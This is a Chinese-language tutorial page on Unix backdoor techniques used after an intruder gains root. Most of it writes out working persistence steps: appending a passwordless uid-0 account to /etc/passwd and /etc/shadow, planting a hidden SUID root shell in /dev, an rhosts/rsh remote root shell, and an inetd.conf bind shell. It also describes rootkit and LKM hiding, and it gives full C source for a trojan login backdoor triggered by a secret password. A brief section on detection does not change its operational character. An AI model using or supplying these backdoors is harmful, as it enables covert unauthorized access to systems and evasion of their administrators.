后門簡介 入侵者完全控制系統(tǒng)后，為方便下次進入而采用的一種技術(shù)。
一般通過修改系統(tǒng)配置文件和安裝第三方后門工具來實現(xiàn)。
具有隱蔽性，能繞開系統(tǒng)日志，不易被系管理員發(fā)現(xiàn)等特點。 常用后門技術(shù) 增加超級用戶賬號
破解/嗅探用戶密碼
放置SUID Shell
rhosts
利用系統(tǒng)服務(wù)程序
TCP/UDP/ICMP Shell
Crontab定時任務(wù)
共享庫文件
工具包rootkit
可裝載內(nèi)核模塊(LKM) 增加超級用戶 # echo "e4gle:x:0:0::/:/bin/sh" >>
/etc/passwd
# echo "e4gle::-1:-1:-1:-1:-1:-1:500" >>
/etc/shadow
如果系統(tǒng)不允許uid=0的用戶遠程登錄，
還需要增加一個普通用戶賬號。 破解/嗅探用戶密碼 獲得shadow文件后，用John the Ripper
工具破解薄弱的用戶密碼。
安裝sniffit等嗅探工具，監(jiān)聽telnet、ftp等
端口，收集用戶密碼。 放置SUID Shell # cp /bin/bash /dev/.rootshell
# chmod u s /dev/.rootshell
普通用戶在本機運行/dev/.rootshell，即
可獲得一個root權(quán)限的shell。 rhosts # echo "" > /.rhosts
# rsh -l root victim.com csh -i
遠程可以得到一個rootshell。 利用系統(tǒng)服務(wù)程序 修改/etc/inetd.conf，
daytime stream tcp nowait /bin/sh sh -I
用trojan程序替換in.telnetd、in.rexecd等
inted的服務(wù)程序
重定向login程序 TCP/UDP/ICMP Shell BindShell，大部分是基于TCP/UDP協(xié)議
的網(wǎng)絡(luò)服務(wù)程序，在高端口監(jiān)聽，很容易
被發(fā)現(xiàn)。
Ping Backdoor，通過ICMP包激活后門，
形成一個Shell通道。
TCP ACK數(shù)據(jù)包后門，能夠穿越防火
墻。 Crontab定時任務(wù) 通過Crontab程序調(diào)度已安裝的后門程序
定時運行，一般在深夜時段，是系統(tǒng)管理
員不在線的時間。 共享庫文件 在共享庫中嵌入后門函數(shù)
使用后門口令激活Shell，獲得權(quán)限
能夠躲避系統(tǒng)管理員對二進制文件本身的
校驗 工具包rootkit 包含一系列系統(tǒng)及后門工具：
- 清除日志中的登錄記錄
- 偽裝校驗和
- 替換netstat、ps等網(wǎng)絡(luò)工具
- 后門登錄程序
易于安裝和使用 可裝載內(nèi)核模塊(LKM) LKM：Loadable Kernel Modules
動態(tài)的加載，不需要重新編譯內(nèi)核。
截獲系統(tǒng)調(diào)用，具有隱藏目錄、文件、進
程、網(wǎng)絡(luò)連接等強大功能。
自身隱蔽性好，發(fā)現(xiàn)難度較大。
著名的LKM包有adore和knark。 后門的檢測 以自己的經(jīng)驗，結(jié)合特定的工具，手工作
一些檢測。
使用Tripwire或md5校驗來檢查系統(tǒng)。
借助IDS系統(tǒng)，監(jiān)聽到目標(biāo)機器的可疑網(wǎng)
絡(luò)連接。 實例：login后門 入侵者先把原始的/bin/login備份，再用一
段程序替換/bin/login。入侵者telnet登錄
進來的時候，通過環(huán)境變量或者終端類型
傳遞了正確的后門密碼，將直接獲得一個
Shell；如果是普通用戶登錄，將會重定
向到原始的login文件，來處理正常的登
錄。
最簡單的login后門ulogin.c源代碼如下： 實例：login后門 #include <stdio.h>
#define PASSWORD "passWORD"
#define _PATH_LOGIN "/sbin/logins" main (argc, argv, envp)
int argc;
char **argv, **envp;
{
char *display = getenv("DISPLAY");
if ( display == NULL ) {
execve(_PATH_LOGIN, argv, envp);
perror(_PATH_LOGIN);
exit(1);
}
if (!strcmp(display,PASSWORD)) {
system("/bin/csh");
exit(1);
}
execve(_PATH_LOGIN, argv, envp);
exit(1);
}

版權(quán)聲明：本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學(xué)習(xí)參考，不代表本站立場，如有內(nèi)容涉嫌侵權(quán)，請聯(lián)系alex-e#qq.com處理。